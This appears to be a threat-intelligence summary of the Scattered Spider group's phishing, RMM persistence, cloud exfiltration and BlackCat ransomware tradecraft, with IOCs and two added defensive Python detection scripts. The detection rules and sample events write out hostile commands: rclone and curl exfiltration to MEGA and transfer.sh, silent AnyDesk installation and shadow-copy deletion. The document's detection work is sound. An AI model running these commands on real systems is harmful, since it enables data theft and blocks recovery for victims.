Scattered Spider is an English-speaking intrusion set that uses advanced phone- and web-based social engineering (phishing, smishing, SIM swapping, MFA bombing) to harvest credentials, take over accounts, and pivot into victim networks, later monetising access via data exfiltration and BlackCat ransomware deployment. Recent campaigns use short-lived phishing domains, RMM tools for persistence, and cloud/file‑sharing services (MEGAsync, Rclone, transfer[.]sh) for exfiltration. #ScatteredSpider #BlackCat

Keypoints

  • Scattered Spider primarily uses tailored phone-based social engineering (voice phishing, smishing, MFA bombing, SIM swapping) to harvest credentials and bypass MFA.
  • Credential harvesting is performed via targeted AiTM/phishing pages that collect passwords and 2FA codes (e.g., submissions routed through pages like fuckyou.php and factor.php).
  • Once inside, actors use stolen credentials, RMM tools (AnyDesk, RemotePC, etc.), VPNs and remote services to establish persistence and lateral movement.
  • Data exfiltration relies on legitimate cloud and file‑sharing services (Rclone, MEGAsync/MEGA, Dropbox, transfer[.]sh, AWS S3) to host large data dumps and avoid burning infrastructure.
  • Scattered Spider evolved from an access broker to a BlackCat ransomware affiliate, adding ransomware deployment and double‑extortion tactics to its playbook.
  • Phishing infrastructure is highly transient: domains are registered via registrars like registrar[.]eu, go live for hours–days, then are replaced to evade detection.

MITRE Techniques

  • [T1566.002] Spearphishing Link – Used to direct victims “to a credential harvesting site” and collect credentials via targeted phishing pages (‘redirected to the “factor.html” page, which prompts the user for what we assess to be a 2FA code’).
  • [T1204.001] User Execution: Malicious Link – Phone- and SMS-based social engineering (smishing, voice calls, Telegram; the voice lure itself maps to [T1566.004] Phishing: Spearphishing Voice) used to coerce users into visiting phishing pages (‘targeted employees with phishing, including smishing and phone calls’).
  • [T1078] Valid Accounts – Compromised credentials were reused for access to cloud and enterprise accounts (“accessed Azure account using stolen credentials”; “took over user accounts”).
  • [T1021] Remote Services / [T1219] Remote Access Software – RDP ([T1021.001]) and commercial RMM/remote-desktop tools (AnyDesk, RemotePC, Chrome Remote Desktop; [T1219]) used for persistence and lateral movement (“Distributed the commercial RMM tool AnyDesk”; “RMM tools … for establishing persistence”).
  • [T1003] OS Credential Dumping – Use of credential‑harvesting and dumping tools (Mimikatz, ProcDump) to extract account secrets (“Mimikatz, ProcDump” listed among tools for credential access).
  • [T1562.001] Impair Defenses: Disable or Modify Tools – Actors disabled security tooling to hinder detection (“Deleted shadow copies, disabled security tools”); the shadow‑copy deletion in the same quote maps to [T1490] Inhibit System Recovery, since it targets recovery rather than detection.
  • [T1567.002] Exfiltration to Cloud Storage – Exfiltration conducted via cloud/file‑sharing services and sync clients (Rclone, MEGAsync/MEGA, DropBox, transfer[.]sh, AWS S3) to host stolen data (“exfiltrated data using Rclone, MEGAsync, FileZilla or DropBox”).

Indicators of Compromise

  • [Phishing domains] targeted company credential pages – linkedinsso[.]com, bell-hr[.]com, and 40+ other domains used to host short-lived phishing pages.
  • [Phishing server IPs] hosting phishing infrastructure – 149.248.14[.]222, 149.28.105[.]251, and ~25 additional IPs observed serving phishing content.
  • [Phishing page filenames] credential collection endpoints – fuckyou.php, factor.php (used to receive credentials and 2FA codes before redirection; the quoted source text also names the 2FA prompt page as factor.html, so both spellings are worth matching).
  • [Cloud/file-sharing services] exfiltration destinations – MEGAsync (MEGA), transfer[.]sh, and Rclone-backed destinations (also Dropbox, AWS S3) used to stage stolen data.
  • [Registrar] domain registration pattern – registrar[.]eu identified as the registrar used for recent phishing domains.

Scattered Spider’s technical procedures focus on phone-based social engineering to harvest credentials, then leverage legitimate remote-access tooling and stolen credentials to move inside networks and maintain persistence. Initial access campaigns use targeted AiTM/phishing pages that immediately capture passwords and 2FA codes (forms submit to endpoints such as fuckyou.php and factor.php), with phishing domains registered via registrars like registrar[.]eu and rotated quickly—often lasting hours or days. Actors commonly reuse purchased or stolen credentials and deploy RMM tools (AnyDesk, RemotePC, Chrome Remote Desktop, RDP tunnelling) or VPN access for command-and-control and lateral movement.

For reconnaissance and escalation they employ public and commodity tools (credential dumpers like Mimikatz/ProcDump, privilege escalation and discovery scripts, and IAM abuse) and frequently disable defenses and delete backups to hinder detection and recovery. Data exfiltration is performed using widely available cloud and file‑sharing services—Rclone, MEGAsync/MEGA, Dropbox, transfer[.]sh, and AWS S3—allowing large-volume transfers to anonymous or resilient storage; this supports subsequent double‑extortion via BlackCat ransomware deployments on Windows, Linux, and ESXi systems.
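The post-access tradecraft above (RMM deployment, shadow-copy deletion, Rclone/MEGAsync/transfer.sh exfiltration) is visible in process-creation telemetry. The following is an added example, not code from the Sekoia post: a small rule set applied to Sysmon-style process-creation events. The tool names come from the page and the command-line syntax is the tools' own (rclone's remote:path form, curl's --upload-file, vssadmin delete shadows); the event dictionaries, the sample events and the exact image names assumed for RemotePC are constructed for the example and should be checked against your own EDR telemetry.

```python
"""Hunt rules for Scattered Spider post-access tradecraft over process-creation events.

Added example, not code from the Sekoia post. Event shape (Sysmon-style dicts)
and SAMPLE_EVENTS are constructed; image names for RemotePC are assumptions.
"""
import re

# (rule name, ATT&CK id, image-name regex (full match), command-line regex (search))
RULES = [
    # rclone copy/sync/move with a remote:path destination, e.g. mega:dump or s3:bucket
    # (a single drive letter like C: is excluded so local-to-local copies do not fire).
    ("rclone transfer to remote", "T1567.002",
     r"rclone(\.exe)?", r"\b(copy|sync|move)\b.*\s[A-Za-z][\w-]+:(?![\\/])"),
    ("MEGAsync client launched", "T1567.002", r"megasync(\.exe)?", r".*"),
    # curl --upload-file / -T with transfer.sh anywhere on the command line.
    ("curl upload to transfer.sh", "T1567.002",
     r"curl(\.exe)?", r"^(?=.*(--upload-file|\s-T\s))(?=.*transfer\.sh)"),
    ("shadow copies deleted", "T1490",
     r"(vssadmin|wmic)(\.exe)?", r"delete\s+shadows|shadowcopy\s+delete"),
    # Assumption: AnyDesk and RemotePC binaries carry these names on disk.
    ("remote access tool started", "T1219", r"(anydesk|remotepc\w*)(\.exe)?", r".*"),
]

COMPILED = [(name, tid, re.compile(img, re.I), re.compile(cmd, re.I))
            for name, tid, img, cmd in RULES]


def image_name(path: str) -> str:
    """Lower-cased basename of a Windows or POSIX image path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def match_event(event: dict) -> list:
    """Return [(rule name, technique id), ...] for every rule the event satisfies."""
    name = image_name(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    return [(rule, tid) for rule, tid, img_re, cmd_re in COMPILED
            if img_re.fullmatch(name) and cmd_re.search(cmd)]


def hunt(events) -> list:
    """Flatten matches into one finding per (event, rule), preserving event order."""
    findings = []
    for ev in events:
        for rule, tid in match_event(ev):
            findings.append({"time": ev.get("UtcTime"), "user": ev.get("User"),
                             "image": image_name(ev.get("Image", "")),
                             "rule": rule, "technique": tid})
    return findings


# Constructed sample events: five malicious, two benign (plain curl fetch, rclone ls).
SAMPLE_EVENTS = [
    {"UtcTime": "2023-09-05 10:14:02", "User": "CORP\\svc-backup",
     "Image": r"C:\Users\svc-backup\AppData\Local\Temp\rclone.exe",
     "CommandLine": r'rclone.exe copy "\\FS01\Finance" mega:dump --transfers 32 --config C:\Users\svc-backup\rclone.conf'},
    {"UtcTime": "2023-09-05 10:20:45", "User": "CORP\\svc-backup",
     "Image": r"C:\Users\svc-backup\AppData\Local\MEGAsync\MEGAsync.exe",
     "CommandLine": r'"C:\Users\svc-backup\AppData\Local\MEGAsync\MEGAsync.exe"'},
    {"UtcTime": "2023-09-05 10:31:10", "User": "CORP\\svc-backup",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe --upload-file C:\Temp\hr.7z https://transfer.sh/hr.7z"},
    {"UtcTime": "2023-09-05 11:02:33", "User": "NT AUTHORITY\\SYSTEM",
     "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"UtcTime": "2023-09-05 09:58:07", "User": "CORP\\svc-backup",
     "Image": r"C:\Users\Public\AnyDesk.exe",
     "CommandLine": r'AnyDesk.exe --install "C:\Program Files (x86)\AnyDesk" --silent'},
    {"UtcTime": "2023-09-05 08:00:00", "User": "CORP\\updater",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe -s https://updates.example.com/manifest.json"},
    {"UtcTime": "2023-09-05 08:05:00", "User": "CORP\\backup-admin",
     "Image": r"C:\Program Files\Backup\rclone.exe",
     "CommandLine": r"rclone.exe ls D:\Backups"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["time"], f["user"], f["image"], "->", f["rule"], f["technique"])
```

The rclone rule keys on the remote:path destination rather than the binary alone, because legitimate backup jobs also use rclone; expect to allow-list your own service accounts and remotes. The MEGAsync and remote-access rules fire on the image name only, which is deliberate: on a host where those tools are not sanctioned, the mere launch is the signal.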

Operationally, the group evolved from selling access to others into full ransomware affiliate operations, combining tailored social engineering, credential theft, persistent remote access through RMM and tunnelling, defense evasion (disabling security tools and deleting shadow copies), and cloud-based exfiltration to maximise monetisation. Monitoring short‑lived phishing domains, associated IP infrastructure, and the specific phishing page artifacts (e.g., form endpoints and redirection patterns) is critical for early detection and disruption.
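The monitoring the paragraph above calls for can be expressed as a short detection pass over web-proxy logs. What follows is an added example, not code from the Sekoia post: it refangs the defanged IOCs listed on this page (the two domains, the two IPs, and the fuckyou.php / factor.php / factor.html page names), parses key=value proxy lines, and flags three things: contact with known infrastructure, POSTs to the harvesting endpoints regardless of host (the artifact that survives domain rotation), and brand-plus-keyword lookalike domains in the style of linkedinsso and bell-hr. The log format, the sample lines, WATCHED_BRANDS and LEGIT_DOMAINS are assumptions made for the example.

```python
"""Detection pass for Scattered Spider-style phishing traffic over web-proxy logs.

Added example, not code from the Sekoia post. IOCs are the ones named on the
page; the key=value log format, SAMPLE_LOG, WATCHED_BRANDS and LEGIT_DOMAINS
are assumptions made for this example.
"""
import re
from urllib.parse import urlparse

# IOCs exactly as written on the page (defanged); refang() makes them matchable.
PHISHING_DOMAINS = ["linkedinsso[.]com", "bell-hr[.]com"]
PHISHING_IPS = ["149.248.14[.]222", "149.28.105[.]251"]
# Page artifacts outlive any single domain, so they are matched regardless of host.
# The page names both factor.php and factor.html for the 2FA prompt; watch both.
HARVEST_ENDPOINTS = {"fuckyou.php", "factor.php", "factor.html"}
# Assumption: brand tokens the actor combines with sso/hr-style words, and the
# domains where those brands legitimately live (so real traffic is not flagged).
WATCHED_BRANDS = ["linkedin", "bell"]
LEGIT_DOMAINS = {"linkedin.com", "bell.ca"}


def refang(ioc: str) -> str:
    """Undo the [.] / hxxp defanging used in threat reports."""
    return (ioc.replace("[.]", ".")
               .replace("hxxps://", "https://")
               .replace("hxxp://", "http://"))


KNOWN_DOMAINS = {refang(d) for d in PHISHING_DOMAINS}
KNOWN_IPS = {refang(i) for i in PHISHING_IPS}

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_line(line: str) -> dict:
    """Parse an assumed key=value proxy line into a dict (quoted values allowed)."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def registered_domain(host: str) -> str:
    """Naive eTLD+1 (last two labels). Fine for .com/.net; use a public-suffix
    library before relying on this for ccTLDs such as .co.uk."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def analyse(line: str) -> list:
    """Return the reasons a proxy line looks like Scattered Spider phishing (empty = clean)."""
    f = parse_line(line)
    u = urlparse(f.get("url", ""))
    host = (u.hostname or "").lower()
    page = u.path.rsplit("/", 1)[-1].lower()
    reasons = []
    if host in KNOWN_DOMAINS:
        reasons.append("known phishing domain")
    if f.get("dst_ip") in KNOWN_IPS:
        reasons.append("known phishing IP")
    # A POST to a harvesting page is the credential/2FA submission itself and
    # fires even when the actor has rotated to a domain nobody has catalogued.
    if page in HARVEST_ENDPOINTS and f.get("method", "").upper() == "POST":
        reasons.append(f"credential form POST to {page}")
    reg = registered_domain(host)
    if reg and reg not in LEGIT_DOMAINS and any(b in reg.split(".")[0] for b in WATCHED_BRANDS):
        reasons.append(f"brand lookalike domain {reg}")
    return reasons


def scan(lines) -> list:
    """Run analyse() over every line and keep the ones that fired."""
    hits = []
    for line in lines:
        reasons = analyse(line)
        if reasons:
            f = parse_line(line)
            hits.append({"ts": f.get("ts"), "src": f.get("src"),
                         "url": f.get("url"), "reasons": reasons})
    return hits


# Constructed sample traffic: a known domain with its credential and 2FA POSTs,
# a rotated never-seen lookalike domain, and two benign requests.
SAMPLE_LOG = [
    "ts=2023-09-05T08:12:01Z src=10.20.1.55 dst_ip=149.248.14.222 method=GET url=https://linkedinsso.com/ status=200",
    "ts=2023-09-05T08:12:40Z src=10.20.1.55 dst_ip=149.248.14.222 method=POST url=https://linkedinsso.com/fuckyou.php status=302",
    "ts=2023-09-05T08:13:05Z src=10.20.1.55 dst_ip=149.248.14.222 method=POST url=https://linkedinsso.com/factor.php status=302",
    "ts=2023-09-05T09:01:17Z src=10.20.1.77 dst_ip=203.0.113.9 method=POST url=https://bell-hr-portal.net/fuckyou.php status=302",
    "ts=2023-09-05T09:02:00Z src=10.20.1.80 dst_ip=198.51.100.4 method=GET url=https://www.linkedin.com/feed/ status=200",
    "ts=2023-09-05T09:03:30Z src=10.20.1.81 dst_ip=198.51.100.8 method=POST url=https://sso.example.com/login status=200",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ts"], hit["src"], hit["url"], "->", "; ".join(hit["reasons"]))
```

The fourth sample line is the case that matters: the host is not on any list, but the POST to fuckyou.php and the brand token in the domain still surface it, which is exactly why page artifacts deserve a rule of their own when the domains only live for hours. The lookalike heuristic is noisy by design (any label containing "bell" fires), so keep WATCHED_BRANDS short and pair it with domain-age data from your registrar feed.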

Read more: https://blog.sekoia.io/scattered-spider-laying-new-eggs/